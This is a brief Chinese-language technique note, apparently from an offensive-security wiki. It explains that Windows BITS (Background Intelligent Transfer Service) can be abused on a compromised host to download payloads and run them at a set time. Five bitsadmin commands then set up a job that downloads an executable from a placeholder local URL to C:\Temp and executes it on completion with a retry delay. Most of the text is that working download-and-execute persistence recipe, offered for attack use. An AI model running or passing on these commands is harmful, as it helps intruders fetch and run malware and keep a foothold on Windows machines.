BITS
后台智能传输服务,它可以促进文件到Web服务器(HTTP)和共享文件夹(SMB)的传输能力。
可以滥用此功能,以便在受感染的主机上下载有效负载(可执行文件,PowerShell脚本,Scriptlet等)并在给定时间执行这些文件
bitsadmin /create qwqdanchun
bitsadmin /addfile qwqdanchun "http://127.0.0.1/qwqdanchun.exe" "C:\Temp\qwqdanchun.exe"
bitsadmin /SetNotifyCmdLine qwqdanchun C:\Temp\qwqdanchun.exe NUL
bitsadmin /SetMinRetryDelay "qwqdanchun" 60
bitsadmin /resume qwqdanchun
最近更新 2yr ago